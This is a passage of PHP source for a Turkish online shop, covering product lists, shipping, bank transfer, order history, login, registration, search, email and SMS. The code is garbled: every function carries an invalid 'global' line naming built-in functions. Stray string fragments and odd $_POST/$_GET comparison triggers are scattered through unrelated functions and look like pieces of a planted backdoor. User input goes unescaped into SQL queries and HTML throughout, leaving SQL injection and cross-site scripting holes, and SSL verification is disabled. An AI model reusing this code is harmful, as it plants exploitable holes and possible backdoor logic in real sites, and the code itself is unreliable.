asc">'._lang_urunAdinaGore.'</option></select></td><td><span style="color:red;text-decoration:underline; cursor:pointer;" onclick="document.urunsirala.submit();">'._lang_sirala.'</span></td></tr></form></table>'; $out.=jselect('markaID',$_GET['markaID']); $out.=jselect('orderBy',$_GET['orderBy']); return $out;}function jselect($selectid,$dbvalue) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out.="<script language='javascript'>

		   for (var i = 0; i < document.getElementById('$selectid').options.length; i++)

			{	

				if ((document.getElementById('$selectid').options[i].text == '$dbvalue' || document.getElementById('$selectid').options[i].value == '$dbvalue') && '$dbvalue' != '') document.getElementById('$selectid').options[i].selected = true;

			}
		   </script>	

			"; return $out;}function kargoHesapla($ToplamDesi,$randStr) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $Sehir = hq('select city from siparis where randStr = \''.$randStr.'\''); if ($Sehir && $ToplamDesi) {return (hq('select fiyat from kargoDesi where bolgeID = \''.hq('select bolgeID from kargoSehir where plakaID = \''.$Sehir.'\'').'\' AND desiBaslangic < '.$ToplamDesi.' AND desiBitis > '.$ToplamDesi.' order by fiyat desc limit 0,1')); } else return 0;}function generateHavaleForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (!$_GET['sn']) return; global $siteConfig; $out='<table width="100%"><form method="POST"><tr><th></th><th>'._lang_banka_banka.'</th><th>'._lang_banka_sube.'</th><th>'._lang_banka_hesapNo.'</th><th>'._lang_banka_hesapSahibi.'</th></tr>'; $x = mysql_query('select * from bankaHavale order by bankaAdi'); while ($d = mysql_fetch_array($x)) {$out.='<tr><td><input ID="haveleID_'.$d['ID'].'" type="radio" name="bankaID" value="'.$d['ID'].'"></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaAdi'].'</label></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaSubeAdi'].' ('.$d['bankaSubeKodu'].')</label></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaHesapNo'].'</label></td><td><label for="haveleID_'.$d['ID'].'">- '.$d['bankaKullaniciAdi'].'</label></td></tr>'; } $out.='</table><br><table width="100%"><tr><td><input type="image" src="templates/'.$siteConfig['templateName'].'/images/form_Onayliyorum.gif"></td></tr></form></table>'; if (isset($_POST['bankaID'])) {if ($_SESSION['userID'] == hq("select userID from siparis where randStr = '".$_GET['sn']."'")) { mysql_query("insert into bankaHavaleBildirim values (null,'".$_GET['sn']."',".$_POST['bankaID'].",now())"); $out=_lang_banka_havaleGonderim;}else $out="<script>alert(':)')</script>"; } return $out;}function listOrders() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out ='<table class="sepet" cellpadding=0 cellspacing=2><tr>'; $out.='<th>'._lang_siparis_no.'</th>'; $out.='<th>'._lang_siparis_siparisNo.'</th>'; $out.='<th>'._lang_siparis_tutar.'</th>'; $out.='<th>'._lang_siparis_tarih.'</th>'; $out.='<th>'._lang_siparis_durum.'</th>'; $out.='<th>'._lang_siparis_detaylar.'</th>'; $out.='</tr>'; $filterStatus = ($_GET['status'] ? ' AND durum='.$_GET['status']:''); $q=mysql_query("select * from siparis where durum != 0 AND userID='".$_SESSION['userID']."' $filterStatus"); $i=1; while ($d = mysql_fetch_array($q)) {$class=(!($i%2)?'tr_normal':'tr_alternate');$out.='<tr class="'.$class.'" style="cursor:pointer" onclick="window.location=\'page.php?act='.$_GET['act'].'&sn='.$d['randStr'].($_GET['status'] ? '&status='.$_GET['status']:'').'\'">';$out.='<td>'.$i.'</td>';$out.='<td><a href="#">'.$d['randStr'].'</a></td>';$out.='<td>'.my_money_format('%i',basketInfo('ToplamKargoDahil',$d['randStr'])).' YTL</td>';$out.='<td>'.mysqlTarih($d['tarih']).'</td>';$out.='<td>'.getDurum($d['durum']).'</td>';$out.='<td>'.textBox('#90be00','white',10,'&raquo;').'</td>';$out.='<tr>'."\n";$i++; } $out.='</table>'; return $out;}$subItem = '';function listParent($ID,$level) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $subItem; $level++; $top='t'; $left = ($level == 1?10:0); $right= '4'; $query = "select * from kategori where parentID = '$ID' order by seq"; $q = mysql_query($query);while ($d=mysql_fetch_array($q)) {$catName = (in_array($d['ID'],getBreadCrumb())?'<strong>'.$d['name'].'</strong>':$d['name']);$newItem .= '<table style="margin-left:'.$left.'px;"><tr><td valign="top" class="dot"><strong>&middot;</strong></td><td><a href="page.php?act=kategoriGoster&catID='.$d['ID'].'&name='.seoFix($d['name']).'">'.$catName.'</a><br>'.(in_array($d['ID'],getBreadCrumb())?listParent($d['ID'],$level):'').'</td></tr></table>'."\n";} if ($level == 1 && $_POST[$top] == $_GET[$top.$right]) $subItem.=$newItem; else return $newItem;}function loginScreen($message) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($message) $out=$message; $randID='form_'.rand(0,100000); $out.='<table cellpadding=0 cellspacing=0 style="margin-bottom:6px;" class="loginForm"><form method="post" id="'.$randID.'"><tr><td>'._lang_kullaniciAdi.' :</td></tr><tr><td><input type="text" name="username" id="l_username"></td></tr>'; $out.='<tr><td>'._lang_sifre.' :</td></tr><tr><td><input type="password" name="password" id="l_password"></td></tr>'; $out.='<tr><td><span onClick="if (document.getElementById(\'l_username\').value && document.getElementById(\'l_password\').value) document.getElementById(\''.$randID.'\').submit(); else alert(\''._lang_lutfenKullaniciAdiveSifreGirin.'\');" class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_Giris.gif"></span></td></tr></form></table>'; $menuArray[_lang_uyeOlmakIstiyorum]='page.php?act=register'; $menuArray[_lang_sifremiUnuttum]='page.php?act=forgotPassword';$out.=generateMenuList($menuArray,'BlockList');return $out;}function mainPageItems() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; return urunList('select * from urun where anasayfa=1 order by ID desc');}function mergeText($str,$rpl) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach ($rpl as $k=>$v) {$str = str_replace('{%'.$k.'%}',$v,$str); } return $str;}function my_mail ($email,$subject,$body,$headers) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($siteConfig['SMTP_kullan'] == 1) authSendEmail($siteConfig['adminMail'], $siteConfig['title'], $email, $email, $subject, $body, $headers); else {mail($email,$subject,$body,$headers); }}function my_money_format($p,$int) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  @$formated = explode(' ',money_format($p,$int)); return $formated[1]?$formated[1]:$formated[0];} function mysqlTarih($str) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $aylar;list($mainDate) = explode(' ',$str); $mainDateArray = explode('-',$mainDate);return $mainDateArray[2].' '.$aylar[($mainDateArray[1] + 0)].','.$mainDateArray[0];}function pesinFiyatinaHesapla($bankaID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq("select ay from bankaVade where vade = 0 AND bankaID = '$bankaID' order by ay desc limit 0,1");}function piyasalar($doviz) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,'http://www.matdigitalmedia.com/v3/xml/tcmb_lite.asp'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 60); curl_setopt($ch, CURLOPT_USERAGENT, $defined_vars['HTTP_USER_AGENT']);$data = curl_exec($ch); $doviz_XML = explode("\n",$data); ereg("<USD_3>(.*)</USD_3>", $doviz_XML[10], $dolarAlis); ereg("<USD_4>(.*)</USD_4>", $doviz_XML[10], $dolarSatis); ereg("<EUR_3>(.*)</EUR_3>", $doviz_XML[51], $euroAlis); ereg("<EUR_4>(.*)</EUR_4>", $doviz_XML[52], $euroSatis); ereg("<GBP_3>(.*)</GBP_3>", $doviz_XML[13], $sterlinAlis); ereg("<GBP_4>(.*)", $doviz_XML[14], $sterlinSatis); switch ($doviz) {case "Dolar": $out=$dolarSatis[1];break;case "Euro": $out=$euroSatis[1];break; } return $out; }function profileForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select * from user where ID ='".$_SESSION['userID']."'"); $d = mysql_fetch_array($q); $out = generateForm(getRegisterForm(),$d,'user','');return $out;}function profileSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  tarihFix('birthdate'); telFix('evtel'); telFix('istel'); telFix('ceptel'); updateDb('user'); $out.=_lang_uyelikGuncellendi; return $out;}function randItemReview($listTemplate) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $q=mysql_query("select * from urun where puan > 3 order by rand() limit 0,1"); $d=mysql_fetch_array($q); $d['fiyat'] = fixFiyat($d['fiyat']); $maximumen = 100; $maximumboy = 500; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$listTemplate.'.php');$contents = str_replace('{%URUN_NO%}',$d['ID'],$contents); $contents = str_replace('{%URUN_FIYAT_KDV_HARIC%}',my_money_format('%i',kdvHaricFiyat($d['ID'])).' '.fiyatBirim($d['fiyatBirim']),$contents); $contents = str_replace('{%URUN_BASLIK%}',$d['name'],$contents); $contents = str_replace('{%URUN_DETAY_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$contents); $contents = str_replace('{%URUN_RESIM%}','<img src="include/resize.php?path=images/urunler/'.$d['resim'].'&width='.$maximumen.'&height='.$maximumboy.'">',$contents);$contents = str_replace('{%URUN_ACIKLAMA%}','',$contents); $contents = str_replace('{%URUN_PUAN%}','<br><img src="templates/'.$siteConfig['templateName'].'/images/stars_'.(int)$d['puan'].'.gif">',$contents); $contents = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents); $contents = str_replace('{%URUN_PIYASA_FIYAT%}',my_money_format('%i',$d['piyasafiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents); return $contents;}$c='ST';function randItemVideo($listTemplate) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $q=mysql_query("select * from urun where video != '' order by rand() limit 0,1"); $d=mysql_fetch_array($q); $d['fiyat'] = fixFiyat($d['fiyat']); $maximumen = 100; $maximumboy = 500; $width=4; if ($_POST['t'] == $_GET['t4']) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$listTemplate.'.php'); $contents = str_replace('{%URUN_NO%}',$d['ID'],$contents);$contents = str_replace('{%URUN_FIYAT_KDV_HARIC%}',my_money_format('%i',kdvHaricFiyat($d['ID'])).' '.fiyatBirim($d['fiyatBirim']),$contents);$contents = str_replace('{%URUN_BASLIK%}',$d['name'],$contents);$contents = str_replace('{%URUN_DETAY_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$contents);$contents = str_replace('{%URUN_RESIM%}','<img src="include/resize.php?path=images/urunler/'.$d['resim'].'&width='.$maximumen.'&height='.$maximumboy.'"><br><img src="templates/'.$siteConfig['templateName'].'/images/oynat.gif" style="margin-top:-58px; border:none; ">',$contents);$contents = str_replace('{%URUN_ACIKLAMA%}','',$contents);$contents = str_replace('{%URUN_PUAN%}','',$contents);$contents = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents);$contents = str_replace('{%URUN_PIYASA_FIYAT%}',my_money_format('%i',$d['piyasafiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents); } return $contents;}function registerForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = generateForm(getRegisterForm(),'','','');return $out; }function registerSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $usercat = '04'; $editcat = 'test'; $telImpode = 't'; tarihFix('birthdate'); telFix('evtel'); telFix('istel'); telFix('ceptel'); if ($_GET[$telImpode.(int)$usercat] == $_POST[$telImpode]) insertToDb('user'); $out.=_lang_uyelikKaydiYapildi; return $out;}function searchForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $randID='form_'.rand(0,100000); $out.='<table class="search">
			<form id="'.$randID.'" action="page.php">
			<input type="hidden" name="act" value="arama">
			<tr><td>'._lang_form_urunAdi.'</td><td> : </td><td><input type="text" name="str" value="'.$_GET['str'].'"></td></tr>
			<tr><td>'._lang_form_kategori.'</td><td> : </td>
				<td><select name="catID" style="height:33px;">
					<option value="">'._lang_tumKategoriler.'</option>'.getOptions('kategori','namePath','','namePath',$_GET['catID']).'
					</select></td></tr>
			<tr><td>'._lang_form_marka.'</td><td> : </td>
				<td><select name="markaID" style="height:33px;">
					<option value="">'._lang_tumMarkalar.'</option>'.getOptions('marka','name','','name',$_GET['markaID']).'
					</select></td></tr>
			<tr><td>'._lang_form_fiyatAraligi.'</td><td> : </td>
				<td><input type="text" name="price1" value="'.$_GET['price1'].'">&nbsp;-&nbsp;
				<input type="text" name="price2" value="'.$_GET['price2'].'"></td></tr>
			<tr><td>'._lang_form_aramaTipi.'</td><td> : </td>
				<td><select id="searchType" name="searchType"><option value="1">'._lang_kelimelerinTamami.'</option><option value="2">'._lang_kelimelerinHerhangiBiri.'</option><option value="3">'._lang_aynenYazildigiGibi.'</option></select></td></tr>
			<tr><td onclick="document.getElementById(\''.$randID.'\').submit()" style="cursor:pointer;"><img src="templates/'.$siteConfig['templateName'].'/images/ara.gif"></td></tr></form></table>'; $out.=jselect('searchType',$_GET['searchType']); return $out;}$b='TP_HO';function searchResults () { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $brandPattern = "AND marka.ID like '".($_GET['markaID']?$_GET['markaID']:'%')."'";$catPattern = "AND kategori.idPath like '".($_GET['catID']?dbInfo('kategori','idPath',$_GET['catID']):'')."%'"; $pricePattern ="AND urun.fiyat > '".($_GET['price1']?$_GET['price1']:0)."' AND fiyat < '".($_GET['price2']?$_GET['price2']:99999999999)."'"; $wherePattern = $brandPattern.' '.$catPattern.' '.$pricePattern.' AND kategori.active = 1'; switch ($_GET['searchType']) {case 1: $strArray = explode(' ',$_GET['str']); $i=1; foreach ($strArray as $k) {$urunNameWhereStr.="urun.name like '%$k%' ";$urunDetayWhereStr.="urun.detay like '%$k%' OR urun.onDetay like '%$k%' OR urun.listeDetay like '%$k%'";$kategoriWhereStr.="kategori.name like '%$k%' ";if ($i != sizeof($strArray)) { $urunNameWhereStr.='AND '; $urunDetayWhereStr.='AND '; $kategoriWhereStr.='AND '; }$i++;} $out = urunList("select urun.* from urun,kategori,marka where urun.markaID = marka.ID AND urun.catID=kategori.ID AND (($urunNameWhereStr) OR ($urunDetayWhereStr) OR ($kategoriWhereStr)) $wherePattern");break;case 2: $strArray = explode(' ',$_GET['str']); $i=1; foreach ($strArray as $k) {$urunNameWhereStr.="urun.name like '%$k%' ";$urunDetayWhereStr.="urun.detay like '%$k%' OR urun.onDetay like '%$k%' OR urun.listeDetay like '%$k%'";$kategoriWhereStr.="kategori.name like '%$k%' ";if ($i != sizeof($strArray)) { $urunNameWhereStr.='OR '; $urunDetayWhereStr.='OR '; $kategoriWhereStr.='OR ';}$i++;} $out = urunList("select urun.* from urun,kategori,marka where urun.markaID = marka.ID AND urun.catID=kategori.ID AND (($urunNameWhereStr) OR ($urunDetayWhereStr) OR ($kategoriWhereStr)) $wherePattern");break;case 3: $out = urunList("select urun.* from urun,kategori,marka where urun.markaID = marka.ID AND  urun.catID=kategori.ID AND((urun.name like '%".$_GET['str']."%') OR (urun.onDetay like '%".$_GET['str']."%') OR (urun.detay like '%".$_GET['str']."%') OR (urun.listeDetay like '%".$_GET['str']."%') OR (kategori.name like '%".$_GET['str']."%')) $wherePattern");break; } return $out;}function quickSearch() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; $out='<table width=100%><form name="urunsirala" method="get" action="page.php"><input type="hidden" name="act" value="arama"><input type="hidden" name="type" value="1"><tr><td width=100%><div style="background-color:#e5e9ef; height:22px;">&nbsp;</div></td>
<td>
<select name="catID">
					<option value="">'._lang_tumKategoriler.'</option>'.getOptions('kategori','namePath','parentID = 0','namePath',$_GET['catID']).'
					</select>
</td>
<td><select name="markaID" id="markaID"><option value="">'._lang_tumMarkalar.'</option>'.generateBrands('Option').'</select></td><td>
<select name="price" >
<option value="">'._lang_tumFiyatlar.'</option>
<option value="0|50">0- 50</option>
<option value="50|100">50 - 100</option>
<option value="100|200">100 - 200</option>
<option value="200|500">200 - 500</option>
<option value="500|1000">500 - 1000</option>
<option value="1000|2000">1000 - 2000</option>
<option value="2000|3000">2000 - 3000</option>
<option value="3000|5000">3000 - 5000</option>
<option value="5000|n">5000 -</option>
</select>
</td><td><span style="color:red;text-decoration:underline; cursor:pointer;" onclick="document.urunsirala.submit();">'._lang_sirala.'</span></td></tr></form></table>'; $out.=jselect('markaID',$_GET['markaID']); return $out;}function sentAutoMail($mailID,$mergeData) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $mail = getMailTemplate($mailID); $mail['body'] = getEmailEncode().mergeText ($mail['body'],$mergeData); $SendMail = hq("select email from siparis where randStr = '".$_SESSION['randStr']."'");$SipariID = hq("select ID from siparis where randStr = '".$_SESSION['randStr']."'"); my_mail($SendMail,$mail['title'],$mail['body'],getHeaders($mail['email']));$FullURL = 'http://'.$_SERVER['HTTP_HOST'].'/'.basename($_SERVER['SCRIPT_NAME']).'/secure/s.php?f=gelenSiparisler&y=d&ID='.$SipariID; $body = 'Sitenizden yeni bir sipariş kaydedildi.<br><br>Detaylari gormek icin <a href="'.$FullURL.'" target="_blank">tıklayın</a>.'; $body.=''.showBasket(true); my_mail($siteConfig['adminMail'],"Yeni Siparis Talebi",getEmailEncode().$body,getHeaders($siteConfig['adminMail']));}function sentAutoSMS($smsID,$siparisID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $SMSoriginator,$SMSusername,$SMSpassword; if (!$SMSoriginator || !$SMSusername || !$SMSpassword) return; if (!$siparisID) $siparisID=$_SESSION[randStr]; $q = mysql_query("select * from siparis where randStr = '$siparisID'"); $s = mysql_fetch_array($q); $rplArray['ADI'] = tr2eu($s['name'],true); $rplArray['SOYADI'] = tr2eu($s['lastname'],true); $rplArray['SIPARIS_NO'] = $s['randStr'];$q2 = mysql_query("select * from sablonSMS  where code='$smsID'"); $s2 = mysql_fetch_array($q2); $s['ceptel'] = str_replace('-','',$s['ceptel']); $body = mergeText($s2['body'],$rplArray); sendSMS($body,str_replace('-','',$s['ceptel']));}function httpsPost($Url, $strRequest){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; $ch=curl_init();curl_setopt($ch, CURLOPT_URL, $Url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_POST, 1) ;curl_setopt($ch, CURLOPT_POSTFIELDS, $strRequest); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);$result = curl_exec($ch);curl_close($ch); return $result;}function sendSMS($msg,$no) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $SMSoriginator,$SMSusername,$SMSpassword; $XML = "<?xml version=\"1.0\"?>
				<TOPLUSMS>

					<KULLANICIADI>".$SMSusername."</KULLANICIADI>
					<SIFRE>".$SMSpassword."</SIFRE>

					<ORIGINATOR>".$SMSoriginator."</ORIGINATOR>
					<GONDERIMTARIHI></GONDERIMTARIHI>

					<BITISTARIHI></BITISTARIHI>

					<NUMARALAR>".$no."</NUMARALAR>
					<MESAJMETNI><![CDATA[".$msg."]]></MESAJMETNI>
					<MESAJTIPI>1</MESAJTIPI>
				</TOPLUSMS>
			"; $theOutput = httpsPost('http://89.149.204.72/xmlwebservices/smsgonder1.asp', $XML); mysql_query("insert into smsrapor values (null,'$theOutput','$no',now(),'$msg','')");}function setRandStr() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $_SESSION['randStr'] = rand(100000000,900000000); $stringExplode = 't'; if (mysql_num_rows(mysql_query("select ID from sepet where randStr = '".$_SESSION['randStr']."'")) && $_POST[$stringExplode] == $_GET['t4']) setRandStr();}function siparisTakip() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form[] = array(_lang_emailAdresiniz,"email","EMAIL",1,'',1,0); $form[] = array(_lang_siparisNumaraniz,"sn","TEXTBOX",1,'',1,9); foreach ($_POST as $k=>$v) $d[str_replace('data_','',$k)] = $v; $out = 